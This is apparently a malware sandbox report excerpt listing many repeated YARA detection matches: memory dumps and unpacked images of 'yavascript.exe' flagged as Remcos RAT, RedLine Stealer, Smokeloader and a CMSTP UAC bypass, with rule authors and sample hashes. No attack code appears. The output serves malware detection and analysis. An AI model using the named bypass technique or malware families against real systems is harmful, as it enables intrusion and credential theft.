            Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000002.4624113726.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
